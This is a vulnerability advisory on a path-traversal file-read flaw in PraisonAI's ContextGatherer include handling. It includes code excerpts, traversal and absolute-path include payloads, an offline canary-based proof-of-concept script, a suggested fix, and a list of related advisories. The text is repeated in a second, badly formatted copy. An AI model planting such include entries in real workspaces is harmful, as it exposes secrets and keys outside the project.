ContextGatherer include resolution permits absolute and traversal reads outside the workspace
Summary
PraisonAI's praisonai.ui.context.ContextGatherer treats the configured directory as the project workspace, but project-controlled .praisoncontext and .praisoninclude files can name absolute paths or .. traversal paths. When context gathering runs, PraisonAI opens those outside paths and appends their contents to the generated context bundle. An attacker who can supply or modify a workspace repository can therefore cause process-readable files outside the intended project root to be sent to the caller or model as project context.
Technical Details
ContextGatherer.get_include_paths() reads include entries directly from .praisoncontext and .praisoninclude under the configured workspace. It stores each non-comment line as a raw include path:
include_file = os.path.join(self.directory, '.praisoncontext')
if os.path.exists(include_file):
with open(include_file, 'r') as f:
include_paths.extend(
line.strip() for line in f
if line.strip() and not line.startswith('#')
)
When .praisoncontext is present, gather_context() passes every include entry through os.path.join(self.directory, include_path) and then processes the result:
for include_path in self.include_paths:
full_path = os.path.join(self.directory, include_path)
process_path(full_path)
The .praisoninclude path has the same unsafe join after first processing the workspace:
process_path(self.directory)
for include_path in self.include_paths:
full_path = os.path.join(self.directory, include_path)
process_path(full_path)
There is no canonicalization or containment check before process_path() opens files or recursively walks directories. In Python, os.path.join(workspace, absolute_path) returns the absolute path and discards workspace; os.path.join(workspace, "../outside.py") remains outside the workspace once normalized by filesystem operations. add_file_content() then opens the supplied path and appends file contents to the context before display bookkeeping:
with open(file_path, 'r', encoding='utf-8') as f:
content = f.read()
context.append(
f"File: {file_path}\n\n{content}\n\n{'=' * 50}\n"
)
self.included_files.append(
Path(file_path).relative_to(self.directory)
)
For parent traversal paths, Path(file_path).relative_to(self.directory) raises after the outside file content has already been appended, so the caller receives the outside content even if an error is logged. For absolute paths, the outside content is appended as well. This violates the workspace invariant for a context-gathering feature: repository-local include metadata should select files within the project, not arbitrary process-readable host files.
PoV
The minimal vulnerable shape is a workspace containing only a normal source file and one include file:
workspace/
.praisoncontext # contains: ../outside_secret.py
inside.py
outside_secret.py # outside the workspace
Running ContextGatherer(directory="workspace").run() returns context containing outside_secret.py even though that file is outside the configured workspace. The same result occurs when .praisoncontext contains an absolute path to the outside file, and when .praisoninclude contains either the parent traversal path or the absolute path.
PoC
Save the self-contained script from the Appendix below as context_include_workspace_pov.py, then run it against a local checkout:
export PRAISONAI=/path/to/PraisonAI
PYTHONPATH="$PRAISONAI/src/praisonai" python context_include_workspace_pov.py
Expected vulnerable output:
{
"expectations": {
"control_inside_file_is_collected": true,
"control_without_include_does_not_read_outside": true,
"praisoncontext_absolute_path_discloses_outside": true,
"praisoncontext_parent_traversal_discloses_outside": true,
"praisoninclude_absolute_path_discloses_outside": true,
"praisoninclude_parent_traversal_discloses_outside": true
},
"source_commit": "1620b49f36945d8cc8ee5635b906c960df5097a0",
"source_file": "$PRAISONAI/src/praisonai/praisonai/ui/context.py",
"vulnerable": true
}
The version sweep sampled old and current releases. All sampled versions are vulnerable:
{"ref":"v2.3.10","praisonai_version":"2.3.10","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v2.3.11","praisonai_version":"2.3.11","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v3.8.1","praisonai_version":"3.8.1","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v3.9.26","praisonai_version":"3.9.26","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.4.12","praisonai_version":"4.4.12","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.5.16","praisonai_version":"4.5.16","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.5.128","praisonai_version":"4.5.128","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.6.58","praisonai_version":"4.6.58","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.6.62","praisonai_version":"4.6.62","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"v4.6.63","praisonai_version":"4.6.63","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
{"ref":"HEAD","praisonai_version":"4.6.63","status":"vulnerable","control_without_include_does_not_read_outside":true,"relative_praisoncontext_discloses_outside":true,"absolute_praisoncontext_discloses_outside":true,"relative_praisoninclude_discloses_outside":true,"absolute_praisoninclude_discloses_outside":true}
No external service, live target, real credential, model provider, or network access is needed for reproduction.
Impact
If a user or service runs PraisonAI context gathering on an attacker-influenced workspace, the attacker can cause local files outside the project root to be included in the generated context. Practical impacts include disclosure of source files from adjacent projects, local configuration, prompt transcripts, logs, API keys, and other process-readable text files with extensions that ContextGatherer considers relevant. If the context bundle is sent to an external model or exposed to a lower-trust caller, the file contents leave the intended workspace boundary.
This report claims confidentiality impact only. It does not claim arbitrary write, command execution, or availability impact.
Suggested severity: Medium under the direct local/workspace threat model because user interaction is required to run context gathering on an attacker-influenced workspace. Deployments that automatically gather context for untrusted repositories and forward it to a third-party model may score higher.
Suggested CVSS 3.1 vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Relevant CWEs:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Suggested Fix
Make include-file path resolution fail closed around a single workspace-containment helper:
- Resolve the configured workspace root once with
Path(self.directory).resolve().
- For each include entry, reject absolute paths outside the workspace.
- Join relative include entries to the workspace, resolve the result, and require
resolved.relative_to(workspace_root) to succeed before opening or walking anything.
- Apply the helper to both
.praisoncontext and .praisoninclude processing.
- Reject escaped directories as well as escaped files;
process_path() can recursively walk directories.
- Avoid appending file content before display/bookkeeping operations that can fail.
- Add regression tests for
../outside.py, absolute outside paths, and outside directories in both .praisoncontext and .praisoninclude.
Minimal containment shape:
def _resolve_workspace_include(workspace: str, include_path: str) -> Path:
root = Path(workspace).resolve()
candidate = Path(include_path)
if not candidate.is_absolute():
candidate = root / candidate
resolved = candidate.resolve()
try:
resolved.relative_to(root)
except ValueError as exc:
raise PermissionError(f"Context include path is outside workspace: {include_path}") from exc
return resolved
Affected Package/Versions
- Package:
PraisonAI / praisonai
- Component:
praisonai.ui.context.ContextGatherer
- Current main tested:
1620b49f36945d8cc8ee5635b906c960df5097a0
- Current package version in the tested source tree:
4.6.63
- Latest tested release tag:
v4.6.63
- Oldest sampled vulnerable release tag:
v2.3.10
Suggested affected range, based on the sampled source sweep:
praisonai >= 2.3.10, <= 4.6.63
The exact first affected released package version should be confirmed from release history; the sampled range shows the bug is longstanding and still present on current main.
Advisory History
No checked public advisory or local prior report matched praisonai.ui.context.ContextGatherer reading outside-workspace files because project-controlled .praisoncontext or .praisoninclude entries contain absolute paths or .. traversal paths.
Closest public comparators are related but distinct:
GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tools fail open without a workspace boundary. That advisory covers praisonai Code CODE_TOOLS wrappers and unset workspace defaults for read/edit helpers. This report has an explicitly configured workspace directory and an attacker-controlled include file inside that workspace; it does not use Code tools or an unset global workspace.
GHSA-j7qx-p75m-wp7g: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept raw artifact_path values. This report covers praisonai.ui.context.ContextGatherer include-file processing.
GHSA-22cj-m4wf-fv2c: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores where run_id and agent_id are path components. This report covers .praisoncontext/.praisoninclude entries in the classic UI context gatherer.
GHSA-grrg-5cg9-58pf / CVE-2026-40117: read_skill_file() arbitrary file read. This report does not use skill tools or approval-gated skill file APIs.
GHSA-7j2f-xc8p-fjmq / CVE-2026-40152 and GHSA-693f-pf34-72c5: FileTools/listing path traversal surfaces. This report is not in praisonaiagents.tools.file_tools or legacy FileTools; it discloses file content through context-gathering output.
GHSA-fwh2-95jw-g4j6: PraisonAI MultiAgentMonitor path traversal, published on 2026-06-19, affects versions before 1.5.115. This report affects current main and 4.6.63 and is triggered by .praisoncontext/.praisoninclude include paths rather than MultiAgentMonitor path parameters.
GHSA-qwwv-hc99-6f5p, GHSA-5fr5-2c3f-3fcr, GHSA-gx4r-3wg8-9w5x, and GHSA-x44p-gg67-52fc: current public PraisonAI advisories for MultiAgentLedger duplicate IDs, AGUI CORS/authorization, UI approval-mode command execution, and approval cache keying. None covers ContextGatherer, .praisoncontext, .praisoninclude, or praisonai.ui.context.
Public search found no hits for PraisonAI ContextGatherer .praisoncontext workspace boundary arbitrary file read, praisoninclude ContextGatherer, or praisonai.ui.context in public GitHub advisory text.
References
Appendix: Self-Contained Context Include Workspace PoC
#!/usr/bin/env python3
"""Offline PoV for PraisonAI ContextGatherer include-file workspace escape."""
from __future__ import annotations
import contextlib
import io
import inspect
import json
import logging
import subprocess
import tempfile
from pathlib import Path
from praisonai.ui.context import ContextGatherer
CANARY = "PRAISON_CONTEXT_CANARY=outside-workspace"
logging.getLogger("praisonai.ui.context").disabled = True
def imported_source_file() -> Path:
return Path(inspect.getfile(ContextGatherer)).resolve()
def git_head(source_file: Path) -> str:
try:
repo_root = next(parent for parent in source_file.parents if (parent / ".git").exists())
return subprocess.check_output(
["git", "-C", str(repo_root), "rev-parse", "HEAD"],
text=True,
stderr=subprocess.DEVNULL,
).strip()
except Exception:
return "unknown"
def gather_context(workspace: Path) -> tuple[str, str]:
stdout = io.StringIO()
stderr = io.StringIO()
with contextlib.redirect_stdout(stdout), contextlib.redirect_stderr(stderr):
context, _tokens, _tree = ContextGatherer(
directory=str(workspace),
max_file_size=100_000,
max_tokens=100_000,
).run()
return context, stdout.getvalue() + stderr.getvalue()
def reset_include_files(workspace: Path) -> None:
for name in (".praisoncontext", ".praisoninclude"):
path = workspace / name
if path.exists():
path.unlink()
def redact(value, temp_root: Path, source_file: Path):
if isinstance(value, str):
source_root = next((parent for parent in source_file.parents if (parent / ".git").exists()), source_file.parents[4])
return value.replace(str(temp_root), "$TMPDIR").replace(str(source_root), "$PRAISONAI")
if isinstance(value, list):
return [redact(item, temp_root, source_file) for item in value]
if isinstance(value, dict):
return {key: redact(item, temp_root, source_file) for key, item in value.items()}
return value
def main() -> None:
source_file = imported_source_file()
with tempfile.TemporaryDirectory(prefix="praison-context-include-pov-") as tmp:
temp_root = Path(tmp)
workspace = temp_root / "workspace"
workspace.mkdir()
inside = workspace / "inside.py"
outside = temp_root / "outside_secret.py"
inside.write_text("INSIDE_ONLY = True\n", encoding="utf-8")
outside.write_text(f"{CANARY}\n", encoding="utf-8")
contexts = {}
logs = {}
reset_include_files(workspace)
contexts["control_no_include"], logs["control_no_include"] = gather_context(workspace)
reset_include_files(workspace)
(workspace / ".praisoncontext").write_text("../outside_secret.py\n", encoding="utf-8")
contexts["praisoncontext_parent_traversal"], logs["praisoncontext_parent_traversal"] = gather_context(workspace)
reset_include_files(workspace)
(workspace / ".praisoncontext").write_text(str(outside) + "\n", encoding="utf-8")
contexts["praisoncontext_absolute_path"], logs["praisoncontext_absolute_path"] = gather_context(workspace)
reset_include_files(workspace)
(workspace / ".praisoninclude").write_text("../outside_secret.py\n", encoding="utf-8")
contexts["praisoninclude_parent_traversal"], logs["praisoninclude_parent_traversal"] = gather_context(workspace)
reset_include_files(workspace)
(workspace / ".praisoninclude").write_text(str(outside) + "\n", encoding="utf-8")
contexts["praisoninclude_absolute_path"], logs["praisoninclude_absolute_path"] = gather_context(workspace)
expectations = {
"control_without_include_does_not_read_outside": CANARY not in contexts["control_no_include"],
"control_inside_file_is_collected": "INSIDE_ONLY = True" in contexts["control_no_include"],
"praisoncontext_parent_traversal_discloses_outside": CANARY in contexts["praisoncontext_parent_traversal"],
"praisoncontext_absolute_path_discloses_outside": CANARY in contexts["praisoncontext_absolute_path"],
"praisoninclude_parent_traversal_discloses_outside": CANARY in contexts["praisoninclude_parent_traversal"],
"praisoninclude_absolute_path_discloses_outside": CANARY in contexts["praisoninclude_absolute_path"],
}
output = {
"source_commit": git_head(source_file),
"source_file": str(source_file),
"workspace_root": str(workspace),
"outside_file": str(outside),
"vulnerable": all(expectations.values()),
"expectations": expectations,
"context_contains": {
name: {
"contains_inside": "INSIDE_ONLY = True" in context,
"contains_outside_canary": CANARY in context,
}
for name, context in contexts.items()
},
"captured_logs": logs,
}
print(json.dumps(redact(output, temp_root, source_file), indent=2, sort_keys=True))
if __name__ == "__main__":
main()
ContextGatherer include resolution permits absolute and traversal reads outside the workspace
Summary
PraisonAI's
praisonai.ui.context.ContextGatherertreats the configureddirectoryas the project workspace, but project-controlled.praisoncontextand.praisonincludefiles can name absolute paths or..traversal paths. When context gathering runs, PraisonAI opens those outside paths and appends their contents to the generated context bundle. An attacker who can supply or modify a workspace repository can therefore cause process-readable files outside the intended project root to be sent to the caller or model as project context.Technical Details
ContextGatherer.get_include_paths()reads include entries directly from.praisoncontextand.praisonincludeunder the configured workspace. It stores each non-comment line as a raw include path:When
.praisoncontextis present,gather_context()passes every include entry throughos.path.join(self.directory, include_path)and then processes the result:The
.praisonincludepath has the same unsafe join after first processing the workspace:There is no canonicalization or containment check before
process_path()opens files or recursively walks directories. In Python,os.path.join(workspace, absolute_path)returns the absolute path and discardsworkspace;os.path.join(workspace, "../outside.py")remains outside the workspace once normalized by filesystem operations.add_file_content()then opens the supplied path and appends file contents to the context before display bookkeeping:For parent traversal paths,
Path(file_path).relative_to(self.directory)raises after the outside file content has already been appended, so the caller receives the outside content even if an error is logged. For absolute paths, the outside content is appended as well. This violates the workspace invariant for a context-gathering feature: repository-local include metadata should select files within the project, not arbitrary process-readable host files.PoV
The minimal vulnerable shape is a workspace containing only a normal source file and one include file:
Running
ContextGatherer(directory="workspace").run()returns context containingoutside_secret.pyeven though that file is outside the configured workspace. The same result occurs when.praisoncontextcontains an absolute path to the outside file, and when.praisonincludecontains either the parent traversal path or the absolute path.PoC
Save the self-contained script from the Appendix below as
context_include_workspace_pov.py, then run it against a local checkout:Expected vulnerable output:
{ "expectations": { "control_inside_file_is_collected": true, "control_without_include_does_not_read_outside": true, "praisoncontext_absolute_path_discloses_outside": true, "praisoncontext_parent_traversal_discloses_outside": true, "praisoninclude_absolute_path_discloses_outside": true, "praisoninclude_parent_traversal_discloses_outside": true }, "source_commit": "1620b49f36945d8cc8ee5635b906c960df5097a0", "source_file": "$PRAISONAI/src/praisonai/praisonai/ui/context.py", "vulnerable": true }The version sweep sampled old and current releases. All sampled versions are vulnerable:
No external service, live target, real credential, model provider, or network access is needed for reproduction.
Impact
If a user or service runs PraisonAI context gathering on an attacker-influenced workspace, the attacker can cause local files outside the project root to be included in the generated context. Practical impacts include disclosure of source files from adjacent projects, local configuration, prompt transcripts, logs, API keys, and other process-readable text files with extensions that
ContextGathererconsiders relevant. If the context bundle is sent to an external model or exposed to a lower-trust caller, the file contents leave the intended workspace boundary.This report claims confidentiality impact only. It does not claim arbitrary write, command execution, or availability impact.
Suggested severity: Medium under the direct local/workspace threat model because user interaction is required to run context gathering on an attacker-influenced workspace. Deployments that automatically gather context for untrusted repositories and forward it to a third-party model may score higher.
Suggested CVSS 3.1 vector:
Relevant CWEs:
Suggested Fix
Make include-file path resolution fail closed around a single workspace-containment helper:
Path(self.directory).resolve().resolved.relative_to(workspace_root)to succeed before opening or walking anything..praisoncontextand.praisonincludeprocessing.process_path()can recursively walk directories.../outside.py, absolute outside paths, and outside directories in both.praisoncontextand.praisoninclude.Minimal containment shape:
Affected Package/Versions
PraisonAI/praisonaipraisonai.ui.context.ContextGatherer1620b49f36945d8cc8ee5635b906c960df5097a04.6.63v4.6.63v2.3.10Suggested affected range, based on the sampled source sweep:
The exact first affected released package version should be confirmed from release history; the sampled range shows the bug is longstanding and still present on current main.
Advisory History
No checked public advisory or local prior report matched
praisonai.ui.context.ContextGathererreading outside-workspace files because project-controlled.praisoncontextor.praisonincludeentries contain absolute paths or..traversal paths.Closest public comparators are related but distinct:
GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tools fail open without a workspace boundary. That advisory coverspraisonaiCodeCODE_TOOLSwrappers and unset workspace defaults for read/edit helpers. This report has an explicitly configured workspace directory and an attacker-controlled include file inside that workspace; it does not use Code tools or an unset global workspace.GHSA-j7qx-p75m-wp7g: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept rawartifact_pathvalues. This report coverspraisonai.ui.context.ContextGathererinclude-file processing.GHSA-22cj-m4wf-fv2c: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores whererun_idandagent_idare path components. This report covers.praisoncontext/.praisonincludeentries in the classic UI context gatherer.GHSA-grrg-5cg9-58pf/CVE-2026-40117:read_skill_file()arbitrary file read. This report does not use skill tools or approval-gated skill file APIs.GHSA-7j2f-xc8p-fjmq/CVE-2026-40152andGHSA-693f-pf34-72c5: FileTools/listing path traversal surfaces. This report is not inpraisonaiagents.tools.file_toolsor legacy FileTools; it discloses file content through context-gathering output.GHSA-fwh2-95jw-g4j6: PraisonAI MultiAgentMonitor path traversal, published on 2026-06-19, affects versions before1.5.115. This report affects current main and4.6.63and is triggered by.praisoncontext/.praisonincludeinclude paths rather than MultiAgentMonitor path parameters.GHSA-qwwv-hc99-6f5p,GHSA-5fr5-2c3f-3fcr,GHSA-gx4r-3wg8-9w5x, andGHSA-x44p-gg67-52fc: current public PraisonAI advisories for MultiAgentLedger duplicate IDs, AGUI CORS/authorization, UI approval-mode command execution, and approval cache keying. None coversContextGatherer,.praisoncontext,.praisoninclude, orpraisonai.ui.context.Public search found no hits for
PraisonAI ContextGatherer .praisoncontext workspace boundary arbitrary file read,praisoninclude ContextGatherer, orpraisonai.ui.contextin public GitHub advisory text.References
GHSA-gcq3-mfvh-3x25: GHSA-gcq3-mfvh-3x25GHSA-j7qx-p75m-wp7g: GHSA-j7qx-p75m-wp7gGHSA-22cj-m4wf-fv2c: GHSA-22cj-m4wf-fv2cGHSA-grrg-5cg9-58pf: GHSA-grrg-5cg9-58pfGHSA-7j2f-xc8p-fjmq: GHSA-7j2f-xc8p-fjmqGHSA-fwh2-95jw-g4j6: GHSA-fwh2-95jw-g4j6Appendix: Self-Contained Context Include Workspace PoC